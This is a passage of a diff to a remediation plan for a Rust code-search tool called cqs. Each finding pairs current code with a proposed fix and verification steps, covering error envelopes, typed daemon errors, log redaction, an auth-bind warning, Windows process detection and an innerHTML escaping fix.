+                if json {
+                    // API-V1.30.1-1: error envelope so JSON consumers
+                    // see error.code="timeout" alongside the non-zero exit
+                    // code. Embed the snapshot in the error data so callers
+                    // can still surface counters.
+                    let payload = serde_json::json!({
+                        "snapshot": snap,
+                        "wait_secs": budget_secs,
+                    });
+                    crate::cli::json_envelope::emit_json_error_with_data(
+                        crate::cli::json_envelope::error_codes::TIMEOUT,
+                        &format!("watch index still stale after {budget_secs}s"),
+                        Some(payload),
+                    )?;
+                } else {
+                    print_text(&snap);
+                    eprintln!(
+                        "cqs: watch index still stale after {budget_secs}s wait",
+                    );
+                }
+                std::process::exit(1);
+            }
 ```
-Add tests in `src/slot/mod.rs::tests`: `validate_rejects_leading_dash`, `validate_rejects_trailing_dash`.
+
+### Verification
+
+- `cargo build --features gpu-index`.
+- `cargo test --features gpu-index --lib json_envelope` (covers new variant + helper).
+- Manual: stop daemon, queue files, run `cqs status --watch-fresh --wait --wait-secs 1 --json`; check stdout JSON has `"error":{"code":"timeout",...}` and exit code is 1.
+- Update / add `tests/cli_status_test.rs` to pin the envelope shape with the new `code: "timeout"`.
 
 ---
 
-## P3.16 — Provider tests for malformed cmdline / `LD_LIBRARY_PATH`
+## P2: API-V1.30.1-5 — `daemon_ping`/`status`/`reconcile` return `Result<T, String>` (folded into P2-bundle-wait-fresh)
 
-**Finding:** P3.16
-**Files:** `src/embedder/provider.rs:67-123`; new `#[cfg(test)] mod tests` in same file
-**Why:** No tests in `provider.rs` today; silent CPU fallback on weird inputs is the production failure mode.
+**Files:** `src/daemon_translate.rs:271, 422, 541`
+**Effort:** subsumed by P2-bundle-wait-fresh's `DaemonStatusError` enum
+**Why:** Stringly-typed errors on the public API. Three call sites with overlapping failure modes (socket-missing, transport, parse) collapse into opaque strings. Caller can't distinguish "daemon never ran" from "daemon crashed mid-call" from "daemon answered with garbage".
 
-### Replacement
-Add at the bottom of `src/embedder/provider.rs`:
+### Approach
+
+The wait-fresh bundle already introduces `DaemonStatusError { SocketMissing, Transport, BadResponse }`. Apply the same enum to all three RPCs:
+
 ```rust
-#[cfg(test)]
-mod tests {
-    use super::*;
-    use std::env;
-    use std::sync::Mutex;
+#[cfg(unix)]
+#[derive(Debug, Clone, thiserror::Error)]
+pub enum DaemonRpcError {
+    #[error("daemon socket missing: {0}")]
+    SocketMissing(String),
+    #[error("daemon transport failure: {0}")]
+    Transport(String),
+    #[error("daemon returned malformed response: {0}")]
+    BadResponse(String),
+    #[error("daemon error: {0}")]
+    DaemonError(String),
+}
 
-    static ENV_LOCK: Mutex<()> = Mutex::new(());
+pub fn daemon_ping(cqs_dir: &std::path::Path) -> Result<PingResponse, DaemonRpcError> { ... }
+pub fn daemon_status(cqs_dir: &std::path::Path) -> Result<WatchSnapshot, DaemonRpcError> { ... }
+pub fn daemon_reconcile(...) -> Result<DaemonReconcileResponse, DaemonRpcError> { ... }
+```
 
-    #[test]
-    fn find_ld_library_dir_skips_empty_entries() {
-        let _g = ENV_LOCK.lock().unwrap();
-        let prev = env::var_os("LD_LIBRARY_PATH");
-        // SAFETY: serialized via ENV_LOCK
-        unsafe { env::set_var("LD_LIBRARY_PATH", ":/tmp:"); }
-        let dir = find_ld_library_dir();
-        // /tmp is the only non-empty entry that exists
-        assert_eq!(dir.as_deref(), Some(std::path::Path::new("/tmp")));
-        unsafe {
-            match prev {
-                Some(p) => env::set_var("LD_LIBRARY_PATH", p),
-                None => env::remove_var("LD_LIBRARY_PATH"),
-            }
+Map existing `format!(...)` errors to the appropriate variant:
+- `if !sock_path.exists()` → `SocketMissing`
+- `UnixStream::connect`, `set_*_timeout`, `write`, `read` failures → `Transport`
+- `serde_json::from_str` envelope parse, missing/non-string `status` field, deserialize → `BadResponse`
+- Daemon-returned `status: "err"` envelopes → `DaemonError`
+
+### Verification
+
+- `cargo build --features gpu-index` — likely many call-site fixups (eval/mod.rs, status.rs, hook.rs, doctor.rs); expect ~20-30 lines of churn across callers.
+- All existing tests should pass after updating `Err(String)` to `Err(DaemonRpcError::Variant(_))`.
+
+---
+
+## P2: API-V1.30.1-10 — `WatchSnapshot.idle_secs` frozen at compute time — wire shape lies once snapshot served later
+
+**Files:** `src/watch_status.rs:101, 219`
+**Effort:** ~45 minutes
+**Why:** `idle_secs` is computed via `last_event.elapsed().as_secs()` at snapshot-publish time, but the snapshot can be read by clients seconds later (the daemon publishes every ~100 ms but clients poll arbitrarily). The wire shape claims "seconds since last event" — but it's actually "seconds since last event as of N seconds ago." Consumers gating on `idle_secs > threshold` get a stale answer.
+
+### Current code
+
+```rust
+// src/watch_status.rs:101
+    pub idle_secs: u64,
+
+// src/watch_status.rs:219
+            idle_secs: input.last_event.elapsed().as_secs(),
+```
+
+### Replacement / approach
+
+Two paths — pick one:
+
+**(a) Compute idle on read.** Change `idle_secs` to be derived at JSON-serialization time from a `last_event_unix_secs: i64` field stored in the snapshot. Requires custom serde or a `to_wire` helper. More invasive.
+
+**(b) Document and rename.** Rename the field on the wire to `idle_secs_at_snapshot` and add `snapshot_at` (already exists at line 109) — consumers compute `now - last_event_unix_secs` on their side. Add `last_event_unix_secs: i64` (Unix seconds when the event happened) to the wire shape. Keep `idle_secs` for backcompat as `snapshot_at - last_event_unix_secs` so existing JSON consumers don't break, but mark deprecated in the doc.
+
+**Recommended: (b)** because it makes the wire shape self-describing and consumers can compute fresher idle on demand:
+
+```rust
+// src/watch_status.rs:75-110 — add new field
+pub struct WatchSnapshot {
+    // ... existing fields ...
+    /// Unix timestamp (seconds) of the last filesystem event the watch
+    /// loop observed. Lets clients compute fresher idle on demand
+    /// without retransacting through the daemon. Pair with `snapshot_at`
+    /// to compute `idle_at_snapshot_time` if you need historical value.
+    pub last_event_unix_secs: i64,
+    // idle_secs becomes derived but kept for backcompat:
+    /// Snapshot-time idle seconds. For fresh idle, prefer
+    /// `now - last_event_unix_secs`.
+    pub idle_secs: u64,
+    // ... existing snapshot_at ...
+}
+```
+
+Plumb `last_event_unix_secs` through `WatchSnapshotInput` (compute once at publish: `last_event_unix_secs = SystemTime::now().duration_since(UNIX_EPOCH).map(|d| d.as_secs() as i64 - last_event.elapsed().as_secs() as i64).unwrap_or(0)`).
+
+### Verification
+
+- `cargo build --features gpu-index`.
+- `cargo test --features gpu-index --lib watch_status`.
+- Manual: `cqs status --watch-fresh --json`, sleep 5 s, run again — `last_event_unix_secs` is the same value across both calls if no events fired; `idle_secs` differs by 5.
+
+---
+
+## P2: OB-V1.30.1-9 — `process_file_changes` uses `println!` in non-quiet mode
+
+**Files:** `src/cli/watch/events.rs:147-152`
+**Effort:** ~15 minutes
+**Why:** Daemon process writes user-facing UI to stdout — bypasses tracing infrastructure, can't be filtered by log level, breaks structured-log parsers.
+
+### Current code
+
+```rust
+// src/cli/watch/events.rs:147-152
+    if !cfg.quiet {
+        println!("\n{} file(s) changed, reindexing...", files.len());
+        for f in &files {
+            println!("  {}", f.display());
         }
     }
-
-    #[test]
-    fn find_ld_library_dir_handles_unset() {
-        let _g = ENV_LOCK.lock().unwrap();
-        let prev = env::var_os("LD_LIBRARY_PATH");
-        unsafe { env::remove_var("LD_LIBRARY_PATH"); }
-        let dir = find_ld_library_dir();
-        assert!(dir.is_none());
-        unsafe { if let Some(p) = prev { env::set_var("LD_LIBRARY_PATH", p); } }
-    }
-}
 ```
 
----
+### Replacement / approach
 
-## P3.17 — `blake3_hex_or_passthrough` boundary tests
-
-**Finding:** P3.17
-**Files:** `src/cache.rs:709-721` + `src/cache.rs::tests`
-**Why:** Pin the uppercase / short-hex / passthrough surprises so a future "always-encode" tightening surfaces as an intentional break.
-
-### Replacement
-Add to `src/cache.rs::tests`:
 ```rust
-#[test]
-fn blake3_hex_or_passthrough_uppercase_64_chars_passthrough() {
-    let upper = "ABCDEF0123456789".repeat(4); // 64 chars, all hex
-    assert_eq!(blake3_hex_or_passthrough(upper.as_bytes()), upper);
-}
-
-#[test]
-fn blake3_hex_or_passthrough_short_hex_string_gets_encoded() {
-    let short = "abcd"; // 4 hex chars
-    let out = blake3_hex_or_passthrough(short.as_bytes());
-    assert_eq!(out, "61626364"); // hex of ASCII 'a','b','c','d'
-}
-
-#[test]
-fn blake3_hex_or_passthrough_64_byte_non_hex_gets_encoded() {
-    let bytes = vec![0xAB; 64];
-    let out = blake3_hex_or_passthrough(&bytes);
-    assert_eq!(out.len(), 128);
-    assert!(out.chars().all(|c| c.is_ascii_hexdigit()));
-}
+    // OB-V1.30.1-9: replace stdout println with structured tracing.
+    // The daemon has no terminal — stdout goes to journald via the
+    // systemd unit which writes unstructured. Tracing routes through
+    // the configured subscriber (journald JSON or stderr text) and
+    // honours filter levels.
+    tracing::info!(
+        file_count = files.len(),
+        files = ?files,
+        "watch: reindexing changed files",
+    );
 ```
+
+If a foreground (non-daemon) UX really needs the unstructured print, gate it on a separate `cfg.foreground` or new `cfg.show_progress` flag, not `!cfg.quiet`. The daemon is the sole runtime caller today.
+
+### Verification
+
+- `cargo build --features gpu-index`.
+- Restart daemon, edit a file, `journalctl --user -u cqs-watch -o json | jq '.MESSAGE' | head -3` shows the structured event.
 
 ---
 
-## P3.18 — `SystemTime → i64` cache cast: guard against year-2554 wrap
+## P2: OB-V1.30.1-10 — `serve::search` info logs full query at info — bypasses TraceLayer redaction
 
-**Finding:** P3.18
-**Files:** `src/cache.rs:349-352, 551-555`
-**Why:** `as_secs() as i64` wraps silently above i64::MAX. Defense-in-depth.
+**Files:** `src/serve/handlers.rs:189-232`
+**Effort:** ~15 minutes
+**Why:** `tracing::info!(query = %params.q, ...)` at line 193 logs the user's full search query at info level. TraceLayer already records the URI with redaction; this duplicate log bypasses it. A user accidentally pasting a credential as a search query writes the credential to journal.
 
 ### Current code
-```rust
-// cache.rs:349-352 (write_batch)
-let now = std::time::SystemTime::now()
-    .duration_since(std::time::UNIX_EPOCH)
-    .unwrap_or_default()
-    .as_secs() as i64;
 
-// cache.rs:551-555 (prune_older_than)
-let cutoff = std::time::SystemTime::now()
-    .duration_since(std::time::UNIX_EPOCH)
-    .unwrap_or_default()
-    .as_secs() as i64
-    - (days as i64 * 86400);
-```
-
-### Replacement
-Add a helper at module top:
 ```rust
-fn now_unix_i64() -> Result<i64, CacheError> {
-    let secs = std::time::SystemTime::now()
-        .duration_since(std::time::UNIX_EPOCH)
-        .map_err(|_| CacheError::Internal("clock before unix epoch".into()))?
-        .as_secs();
-    i64::try_from(secs)
-        .map_err(|_| CacheError::Internal("clock above i64 cap".into()))
+// src/serve/handlers.rs:189-232
+pub(crate) async fn search(
+    State(state): State<AppState>,
+    Query(params): Query<SearchQuery>,
+) -> Result<Json<SearchResponse>, ServeError> {
+    tracing::info!(query = %params.q, limit = params.limit, "serve::search");
+
+    // ... rest unchanged ...
+
+    tracing::info!(matches = matches.len(), "search returned");
+    Ok(Json(SearchResponse { matches }))
 }
 ```
-Replace both sites:
+
+### Replacement / approach
+
 ```rust
-let now = now_unix_i64()?;
-// ...
-let cutoff = now_unix_i64()? - (days as i64 * 86400);
+pub(crate) async fn search(
+    State(state): State<AppState>,
+    Query(params): Query<SearchQuery>,
+) -> Result<Json<SearchResponse>, ServeError> {
+    // OB-V1.30.1-10: log only metadata at info; full query at debug
+    // so it's available for local debugging but not journal-retained
+    // by default. The TraceLayer span already has the redacted URI.
+    tracing::debug!(query = %params.q, "serve::search query received");
+    tracing::info!(q_len = params.q.len(), limit = params.limit, "serve::search");
+
+    // ... rest unchanged ...
+
+    tracing::info!(matches = matches.len(), "search returned");
+    Ok(Json(SearchResponse { matches }))
+}
 ```
+
+### Verification
+
+- `cargo build --features gpu-index`.
+- Run `cqs serve` with default `RUST_LOG`, send a search request via curl, confirm `q=...` does not appear in journal at info; appears only at debug.
 
 ---
 
-## P3.20 — Clamp `cqs cache prune --older-than` to sane ceiling
+## P2: PB-V1.30.1-1 — `cmd_serve` `--no-auth` warning misses `0.0.0.0` and `::` wildcard binds
 
-**Finding:** P3.20
-**Files:** `src/cache.rs:548, 551-555`
-**Why:** `u32::MAX * 86400` overflow / underflow → silent "prune everything" on typo.
+**Files:** `src/cli/commands/serve.rs:27`
+**Effort:** ~20 minutes
+**Why:** The "non-loopback + no-auth" warning fires on `--bind 192.168.1.5 --no-auth` but is silent for `0.0.0.0` and `::` — the *most* exposed bind targets. The current substring check `bind != "127.0.0.1" && bind != "localhost" && bind != "::1"` passes wildcard strings unchanged.
 
 ### Current code
+
 ```rust
-pub fn prune_older_than(&self, days: u32) -> Result<usize, CacheError> {
-    let _span = tracing::info_span!("cache_prune", days).entered();
-    let cutoff = /* now */ - (days as i64 * 86400);
-    // ...
-}
+// src/cli/commands/serve.rs:27
+    if no_auth && bind != "127.0.0.1" && bind != "localhost" && bind != "::1" {
+        tracing::warn!(
+            bind = %bind,
+            "binding cqs serve to non-localhost without auth — anyone with network \
+             access to this address can read the index"
+        );
+        eprintln!(
+            "WARN: --bind {bind} with --no-auth exposes cqs serve beyond localhost \
+             with no authentication"
+        );
+    }
 ```
 
-### Replacement
-At the top of the function, clamp + reject:
+### Replacement / approach
+
 ```rust
-pub fn prune_older_than(&self, days: u32) -> Result<usize, CacheError> {
-    const MAX_PRUNE_DAYS: u32 = 36_500; // 100 years
-    let days = days.min(MAX_PRUNE_DAYS);
-    let _span = tracing::info_span!("cache_prune", days).entered();
-    let now = now_unix_i64()?; // see P3.18
-    let cutoff = now - (days as i64 * 86400);
-    if cutoff < 0 {
-        return Err(CacheError::Internal(
-            format!("prune cutoff below epoch (days={days})")
-        ));
+    if no_auth {
+        // PB-V1.30.1-1: parse `bind` once and warn on anything that
+        // doesn't resolve to a loopback address. This subsumes 0.0.0.0
+        // and :: (UNSPECIFIED — most exposed configs of all), concrete
+        // LAN IPs, and hostnames that don't loop back. Parse-failure
+        // (e.g. "localhost") falls through to the explicit name check.
+        let is_loopback = match bind.parse::<std::net::IpAddr>() {
+            Ok(ip) => ip.is_loopback(),
+            Err(_) => matches!(bind.as_str(), "localhost"),
+        };
+        if !is_loopback {
+            tracing::warn!(
+                bind = %bind,
+                "binding cqs serve to non-localhost without auth — anyone with network \
+                 access to this address can read the index"
+            );
+            eprintln!(
+                "WARN: --bind {bind} with --no-auth exposes cqs serve beyond localhost \
+                 with no authentication"
+            );
+        }
     }
-    // ...
-}
 ```
+
+### Verification
+
+- `cargo build --features gpu-index`.
+- `cqs serve --no-auth --bind 0.0.0.0` emits the warn line.
+- `cqs serve --no-auth --bind ::` emits the warn line.
+- `cqs serve --no-auth --bind 127.0.0.1` does not.
+- Add a small unit test if a `serve_warn_decision(bind: &str, no_auth: bool) -> bool` helper is factored out.
 
 ---
 
-## P3.21 — Centralize `i64.max(0) as u32` clamp (8+ sites)
+## P2: PB-V1.30.1-3 — `process_exists` (Windows) substring-matches localized `tasklist` output
 
-**Finding:** P3.21
-**Files:** `src/serve/data.rs:290, 299, 300, 587, 588, 777, 778, 993, 994` (verified 9 sites — note line 290 is a `n_callers` clamp, not just line_start/line_end; audit said 8)
-**Why:** Repeated open-coded clamp pattern silently masks DB-corruption / migration bugs. Replace with a named helper that logs once on negative input.
+**Files:** `src/cli/files.rs:59-72`
+**Effort:** ~45 minutes
+**Why:** `tasklist /FI "PID eq <pid>" /NH` emits `INFO:` only on English Windows. German `INFORMATION:`, French `INFORMATIONS:`, Japanese `情報:`, etc. silently bypass the stale-PID detection, causing every non-English Windows user to see persistent stale-lock errors.
 
-### Current code (one example site)
+### Current code
+
 ```rust
-line_start: line_start.max(0) as u32,
-line_end: line_end.max(0) as u32,
+// src/cli/files.rs:59-72
+#[cfg(windows)]
+fn process_exists(pid: u32) -> bool {
+    use std::process::Command;
+    Command::new("tasklist")
+        .args(["/FI", &format!("PID eq {}", pid), "/NH"])
+        .output()
+        .map(|o| {
+            let output = String::from_utf8_lossy(&o.stdout);
+            // tasklist /FI "PID eq N" does exact filtering.
+            // "INFO:" appears when no process matches; its absence means a match.
+            !output.contains("INFO:")
+        })
+        .unwrap_or(false)
+}
 ```
 
-### Replacement
-Add a helper at top of `src/serve/data.rs`:
+### Replacement / approach
+
 ```rust
-/// Clamp an i64 SQL line number to u32, warning once if the input was
-/// negative (signals DB corruption or migration bug).
-#[inline]
-fn clamp_line_to_u32(v: i64) -> u32 {
-    if v < 0 {
-        tracing::warn!(value = v, "negative line number clamped to 0");
-        0
+#[cfg(windows)]
+fn process_exists(pid: u32) -> bool {
+    use std::process::Command;
+    // PB-V1.30.1-3: CSV format is locale-independent. tasklist /NH /FO CSV
+    // emits exactly one row per match; empty stdout (or whitespace only)
+    // means no match. No human-readable strings to misinterpret.
+    Command::new("tasklist")
+        .args(["/FI", &format!("PID eq {}", pid), "/NH", "/FO", "CSV"])
+        .output()
+        .map(|o| {
+            let output = String::from_utf8_lossy(&o.stdout);
+            // A successful match looks like: "cqs.exe","1234","Console",... CRLF
+            // No match → empty or whitespace-only output.
+            output.trim().contains(&format!(",\"{}\",", pid))
+        })
+        .unwrap_or(false)
+}
+```
+
+The `.contains(&format!(",\"{},\"", pid))` check matches the CSV `pid` column to defend against substring collisions (e.g., PID `12` matching PID `1234`).
+
+### Verification
+
+- `cargo build --target x86_64-pc-windows-msvc --features gpu-index` (or run on Windows).
+- Add a unit test: parse a sample CSV output blob with and without the target PID column.
+- Smoke on a non-English Windows VM: kill an old PID, run `cqs index`, confirm the stale-lock-retry loop fires instead of the immediate fail.
+
+---
+
+## P2: PB-V1.30.1-7 — `cqs hook fire` on Windows-native: `.cqs/.dirty` written but no consumer reads it
+
+**Files:** `src/cli/commands/infra/hook.rs:309-335`, `src/cli/commands/index/build.rs` (consumer side)
+**Effort:** ~45 minutes
+**Why:** On Windows-native, `cqs hook fire` falls through to `.cqs/.dirty` because the daemon path is `#[cfg(unix)]`. But the `.cqs/.dirty` consumer at `watch/mod.rs:594` is *also* `#[cfg(unix)]`. Net: Windows-native users get a marker nothing reads. They must run `cqs index` manually after every git op.
+
+### Current code
+
+```rust
+// src/cli/commands/infra/hook.rs:323-332
+    #[cfg(not(unix))]
+    {
+        report.daemon_error = Some("hook fire requires unix sockets".to_string());
+    }
+
+    // Fallback: leave a marker the daemon will pick up on next start.
+    let dirty = cqs_dir.join(".dirty");
+    std::fs::create_dir_all(&cqs_dir).with_context(|| format!("create {}", cqs_dir.display()))?;
+    std::fs::write(&dirty, b"").with_context(|| format!("touch {}", dirty.display()))?;
+    report.dirty_marker = Some(dirty);
+```
+
+### Replacement / approach
+
+Make `cqs index` (the foreground reindex command) check for `.cqs/.dirty` at startup and consume it. This gives Windows users equivalent functionality on next manual reindex.
+
+1. Add a helper in `src/cli/commands/index/build.rs` (or a new `dirty_marker` module):
+
+```rust
+/// Check `.cqs/.dirty` and consume it (delete) at startup.
+///
+/// Daemon-less platforms (Windows-native) write this marker via
+/// `cqs hook fire`; the next `cqs index` clears it as evidence
+/// that the requested reindex has occurred.
+pub(crate) fn consume_dirty_marker(cqs_dir: &Path) -> bool {
+    let marker = cqs_dir.join(".dirty");
+    if marker.exists() {
+        if let Err(e) = std::fs::remove_file(&marker) {
+            tracing::warn!(error = %e, "failed to remove .dirty marker");
+        }
+        true
     } else {
-        v.min(u32::MAX as i64) as u32
+        false
     }
 }
 ```
-Sweep all 8/9 occurrences of `<x>.max(0) as u32` to `clamp_line_to_u32(<x>)`. Verify with `rg 'max\(0\) as u32' src/serve/data.rs` returning zero hits.
 
----
+2. Call it at the top of `cmd_index` (`src/cli/commands/index/build.rs`):
 
-## P3.22 — Daemon socket-thread join: warn on detach-after-timeout
-
-**Finding:** P3.22
-**Files:** `src/cli/watch.rs:2374-2400`
-**Why:** Doc-comment claims "joined cleanly" but deadline-fall-through silently detaches the thread. Add the warn so logs match reality.
-
-### Current code (sketch — the polling loop)
 ```rust
-let deadline = Instant::now() + Duration::from_secs(5);
-loop {
-    if handle.is_finished() {
-        let _ = handle.join();
-        tracing::info!("Daemon socket thread joined cleanly");
-        break;
-    }
-    if Instant::now() > deadline { break; }
-    std::thread::sleep(Duration::from_millis(50));
+let dirty_consumed = consume_dirty_marker(&cqs_dir);
+if dirty_consumed {
+    tracing::info!("consumed .cqs/.dirty marker — reindex triggered by hook");
 }
 ```
 
-### Replacement
+3. Update the `cqs hook install` Windows-native warning so users understand the `cqs index` requirement:
+
 ```rust
-let deadline = Instant::now() + Duration::from_secs(5);
-let mut joined = false;
-loop {
-    if handle.is_finished() {
-        let _ = handle.join();
-        tracing::info!("Daemon socket thread joined cleanly");
-        joined = true;
-        break;
-    }
-    if Instant::now() > deadline { break; }
-    std::thread::sleep(Duration::from_millis(50));
-}
-if !joined {
-    tracing::warn!(
-        "Daemon socket thread did not exit within 5s; detaching"
+#[cfg(windows)]
+fn cmd_install(...) {
+    eprintln!(
+        "Note: on Windows-native, hooks write `.cqs/.dirty` and your next \
+         `cqs index` will pick it up. Run `cqs index` after major git ops."
     );
 }
 ```
 
----
+### Verification
 
-## P3.23 — `diff::EMBEDDING_BATCH_SIZE` env override
-
-**Finding:** P3.23
-**Files:** `src/diff.rs:158`
-**Why:** Hardcoded 1000 doesn't scale with model dim; ~12 MB only at 1024-dim.
-
-### Current code
-```rust
-const EMBEDDING_BATCH_SIZE: usize = 1000;
-```
-
-### Replacement
-```rust
-fn embedding_batch_size() -> usize {
-    std::env::var("CQS_DIFF_EMBEDDING_BATCH_SIZE")
-        .ok()
-        .and_then(|v| v.parse::<usize>().ok())
-        .filter(|&n| n > 0)
-        .unwrap_or(1000)
-}
-```
-Replace the const reference at the call site with `embedding_batch_size()`. Update the surrounding comment to mention `CQS_DIFF_EMBEDDING_BATCH_SIZE` and the dim sensitivity.
+- `cargo build --features gpu-index`.
+- Manual on a Windows VM: install hook, run a git op, confirm `.cqs/.dirty` appears, then `cqs index` removes it and reindexes.
 
 ---
 
-## P3.24 — Daemon `worker_threads` env override
+## P2: SEC-V1.30.1-3 — `callgraph-3d.js` interpolates `e.message` into innerHTML without escapeHtml
 
-**Finding:** P3.24
-**Files:** `src/cli/watch.rs:115-119`
-**Why:** Hardcoded `min(num_cpus, 4)` caps large-machine parallelism with no escape hatch.
-
-### Current code
-```rust
-let worker_threads = std::thread::available_parallelism()
-    .map(|n| n.get()).unwrap_or(1).min(4);
-```
-
-### Replacement
-```rust
-let worker_threads = std::env::var("CQS_DAEMON_WORKER_THREADS")
-    .ok().and_then(|v| v.parse::<usize>().ok()).filter(|&n| n > 0)
-    .unwrap_or_else(|| {
-        std::thread::available_parallelism()
-            .map(|n| n.get()).unwrap_or(1).min(4)
-    });
-```
-
----
-
-## P3.25 — `train_data::MAX_SHOW_SIZE` env override
-
-**Finding:** P3.25
-**Files:** `src/train_data/git.rs:167`; ideally moved into `src/limits.rs`
-**Why:** Hardcoded 50 MB silently drops large files from training-data extraction with no log signal.
+**Files:** `src/serve/assets/views/callgraph-3d.js:55`
+**Effort:** ~15 minutes
+**Why:** SEC-2 hardening landed `escapeHtml` mirrors in cluster-3d.js and hierarchy-3d.js with explicit comments. callgraph-3d.js missed the pass. Defence-in-depth XSS gap on the bundle-load-failure error path.
 
 ### Current code
-```rust
-const MAX_SHOW_SIZE: usize = 50 * 1024 * 1024;
-```
 
-### Replacement
-```rust
-fn max_show_size() -> usize {
-    std::env::var("CQS_TRAIN_GIT_SHOW_MAX_BYTES")
-        .ok().and_then(|v| v.parse::<usize>().ok()).filter(|&n| n > 0)
-        .unwrap_or(50 * 1024 * 1024)
-}
-```
-Update the caller to call `max_show_size()` and add a `tracing::warn!(path = %path, size, max, "git_show output exceeds max — skipping")` at the early-return site so callers can distinguish "too large" from "binary".
+```js
+// src/serve/assets/views/callgraph-3d.js:43-58
+    async init(container, options) {
+      this.container = container;
+      this.cb = options.callbacks || {};
+      container.innerHTML =
+        '<div style="margin:24px;color:#666">loading 3D renderer…</div>';
 
----
-
-## P3.26 — Lift `BatchCmd::is_pipeable` into the registry
-
-**Finding:** P3.26
-**Files:** `src/cli/batch/commands.rs:325-364` (`is_pipeable`); registry at `src/cli/registry.rs`
-**Why:** #1114 collapsed Group-A/B exhaustive matches but the batch-side `is_pipeable` enum-match was missed; one row per command becomes one row + one batch arm.
-
-### Current code
-```rust
-// src/cli/batch/commands.rs:325-364
-impl BatchCmd {
-    pub fn is_pipeable(&self) -> bool {
-        match self {
-            BatchCmd::Search { .. } | BatchCmd::Gather { .. }
-            | BatchCmd::Scout { .. } | BatchCmd::Onboard { .. }
-            | /* ... ~30 arms ... */ => true,
-            _ => false,
+      if (typeof window.cqsEnsureThreeBundle === "function") {
+        try {
+          await window.cqsEnsureThreeBundle();
+        } catch (e) {
+          container.innerHTML = `<div class="error" style="margin:24px">3D bundle failed to load: ${e.message}</div>`;
+          throw e;
         }
+      }
+```
+
+### Replacement / approach
+
+Mirror the `escapeHtml` helper at the top of the IIFE (matching `cluster-3d.js:21` / `hierarchy-3d.js:19`) and use it on the interpolation:
+
+```js
+// At top of the IIFE, alongside other helpers:
+// SEC-V1.30.1-3 / SEC-2 mirror: this IIFE can't reach app.js's escapeHtml,
+// so mirror it here for any server-derived string interpolated into innerHTML.
+const escapeHtml = (s) =>
+  String(s).replace(/[&<>"']/g, (c) => ({
+    "&": "&amp;",
+    "<": "&lt;",
+    ">": "&gt;",
+    '"': "&quot;",
+    "'": "&#39;",
+  }[c]));
+
+// At line 55:
+container.innerHTML = `<div class="error" style="margin:24px">3D bundle failed to load: ${escapeHtml(e.message)}</div>`;
+```
+
+### Verification
+
+- `cargo build --features gpu-index` (no Rust changes; ensures asset reloads).
+- Manual: simulate a bundle load failure (point the script tag at a 404), confirm error renders as text not HTML.
+
+---
+
+## P2: SEC-V1.30.1-4 — `tag_user_code_trust_level` is shape-coupled
+
+**Files:** `src/cli/commands/mod.rs:216-257`
+**Effort:** ~60 minutes
+**Why:** Walks four hardcoded JSON shapes (`entry_point`, `call_chain`, `callers`, `file_groups[].chunks[]`). Any chunk-shaped object outside these (a future `dependents[]`, `examples[]`, top-level `chunks[]`) is silently emitted with no `trust_level` field. The contract claims "every chunk-returning JSON output carries `trust_level`" but the implementation is "every chunk in one of these four arrays."
+
+### Current code
+
+```rust
+// src/cli/commands/mod.rs:216-257
+pub(crate) fn tag_user_code_trust_level(json: &mut serde_json::Value) {
+    fn tag(obj: &mut serde_json::Map<String, serde_json::Value>) {
+        obj.insert(
+            "trust_level".to_string(),
+            serde_json::Value::String("user-code".to_string()),
+        );
+    }
+    if let Some(root) = json.as_object_mut() {
+        if let Some(ep) = root.get_mut("entry_point").and_then(|v| v.as_object_mut()) {
+            tag(ep);
+        }
+        // ... three more hand-rolled walks ...
     }
 }
 ```
 
-### Replacement
-Add an `is_pipeable: bool` flag to each row of `for_each_command!` in `src/cli/registry.rs`. Generate `BatchCmd::is_pipeable(&self)` from the table via a new `gen_is_pipeable_impl!()` macro. Delete the manual match in `commands.rs:325-364`.
+### Replacement / approach
 
-(If the BatchCmd enum itself isn't yet driven from the registry, this prompt narrows to "drive `is_pipeable` from the table"; the wider refactor of folding `BatchCmd` into the registry is P2-level and listed as #2.)
+Replace the four-shape walker with a recursive visitor that detects chunk-shape signatures:
 
----
-
-## P3.27 — `LlmProvider` resolver via registry slice
-
-**Finding:** P3.27
-**Files:** `src/llm/mod.rs:200-205, 284-304, 362-398`
-**Why:** Three hand-coded match arms (enum, env-var resolve, factory) per provider. Walk a `&[&dyn ProviderRegistry]` slice instead.
-
-### Current code
 ```rust
-// llm/mod.rs:284-304 (resolve)
-match std::env::var("CQS_LLM_PROVIDER").as_deref() {
-    Ok("anthropic") | Err(_) => LlmProvider::Anthropic,
-    Ok("local") => LlmProvider::Local,
-    Ok(other) => { tracing::warn!(provider = other, "unknown CQS_LLM_PROVIDER, defaulting to anthropic"); LlmProvider::Anthropic }
-}
+pub(crate) fn tag_user_code_trust_level(json: &mut serde_json::Value) {
+    // SEC-V1.30.1-4: recursive visitor — any object with the chunk-shape
+    // signature (presence of `name` AND `file` AND a numeric `line_start`)
+    // gets tagged. Future scout/onboard surfaces that grow new
+    // chunk-bearing keys are tagged automatically.
+    fn looks_like_chunk(obj: &serde_json::Map<String, serde_json::Value>) -> bool {
+        obj.contains_key("name")
+            && obj.contains_key("file")
+            && obj.get("line_start").is_some_and(|v| v.is_number())
+    }
 
-// llm/mod.rs:362-398 (create_client)
-match provider {
-    LlmProvider::Anthropic => /* build AnthropicClient */,
-    LlmProvider::Local => /* build LocalProvider */,
+    fn walk(value: &mut serde_json::Value) {
+        match value {
+            serde_json::Value::Object(map) => {
+                if looks_like_chunk(map) {
+                    map.insert(
+                        "trust_level".to_string(),
+                        serde_json::Value::String("user-code".to_string()),
+                    );
+                }
+                for (_k, v) in map.iter_mut() {
+                    walk(v);
+                }
+            }
+            serde_json::Value::Array(arr) => {
+                for v in arr.iter_mut() {
+                    walk(v);
+                }
+            }
+            _ => {}
+        }
+    }
+
+    walk(json);
 }
 ```
 
-### Replacement
-Introduce a registry trait + slice:
-```rust
-pub(crate) trait ProviderRegistry: Sync {
-    fn name(&self) -> &'static str;
-    fn build(&self, cfg: &LlmConfig) -> Result<Box<dyn BatchProvider>, LlmError>;
-}
+### Tests to add
 
-static PROVIDERS: &[&dyn ProviderRegistry] = &[
-    &AnthropicRegistry, &LocalRegistry,
-];
-```
-`resolve()` walks `PROVIDERS.iter().find(|p| p.name() == requested)`; `create_client()` calls the matched `build()`. Add a provider = add one impl + one slice row.
-
----
-
-## P3.28 — Tree-sitter registry coverage self-test
-
-**Finding:** P3.28
-**Files:** `src/language/queries/*.scm`; new test in `src/language/mod.rs`
-**Why:** An empty `chunks.scm` `include_str!`s as `""` and silently emits zero chunks. One assertion catches it.
-
-### Replacement
-Add to `src/language/mod.rs::tests`:
 ```rust
 #[test]
-fn registry_languages_have_nonempty_chunk_query() {
